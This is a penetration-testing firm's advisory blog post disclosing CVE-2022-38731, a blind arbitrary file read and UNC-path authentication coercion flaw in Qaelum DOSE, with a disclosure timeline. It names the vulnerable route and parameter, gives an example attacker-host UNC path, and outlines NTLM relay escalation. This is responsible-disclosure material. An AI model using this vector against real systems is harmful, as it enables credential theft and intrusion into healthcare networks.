In our Ethical Hacking team, the day to day work involves putting oneself in the mindset of an attacker and attempting to compromise the agreed upon targets, in order to improve our clients security posture. This often leads to the team finding and exploiting known vulnerabilities and misconfigurations, but also digging deep and attempting to find those vulnerabilities which are not yet known, more commonly known as “zero-day” vulnerabilities.
During a recent internal infrastructure engagement, a member of the Ethical Hacking team (James Taylor) was able to discover one such vulnerability within a third-party web application.
Technical details
In this case, the discovered vulnerability was a blind (meaning no output was observed) arbitrary file read (meaning the attacker could request any file from the system), that could also be used for authentication coercion via a mechanism known as a Universal Naming Convention (UNC) path.
The software in question was Qaelum DOSE, and is described as “...a dose management solution that automatically monitors, evaluates and reports the radiation dose that patients receive for multi-facility, multi-modality and multi-vendor imaging environments”.
The vulnerability
Specifically, DOSE version 18.08 through to 21.1 and before 21.2 allows for absolute file paths to be supplied by an attacker via the “loadimages” route and “name” parameter. This in turn would allow an attacker to display an arbitrary image from the local system, or a remote system through supplying a UNC path such as “\\attackerip\file.jpg”.
Although any file can be requested, only images are displayed to the attacker. Files can be enumerated on the local system however, due to the “Content-Type” header reflecting the actual content type of the requested file. Although enumeration is interesting, the impact in this case is limited.
Increasing the impact
As UNC paths can be used to load remote images, an attacker could set up a malicious SMB server and relay authentication using tools such as “ntlmrelayx.py”. Additionally, when there is a certificate authority in the domain that has the web enrollment feature enabled, it would be possible to perform NTLM relaying to the HTTP endpoint to obtain a certificate and potentially achieve remote code execution on the vulnerable server.
In Summary
This vulnerability is now tracked as CVE-2022-38731 and we recommend that affected clients upgrade to the latest stable, non-vulnerable version. For more detailed information on the issue, please see the advisory at: https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-38731.
If you would like to engage the services of the Ethical Hacking team, and see how they could help to improve your security posture, please contact Stuart Criddle.
Disclosure timeline
- Vulnerability discovery - 27/05/2022
- Vendor disclosure - 31/05/2022
- Vendor fix - 27/06/2022
- CVE request - 24/08/2022
- CVE assigned - 24/08/2022
- Vendor confirms public disclosure - 16/09/2022
- Public disclosure - 13/02/2023
Contact us
Cyber Threat Operations Lead Partner, PwC United Kingdom
Tel: +44 (0)7725 707360
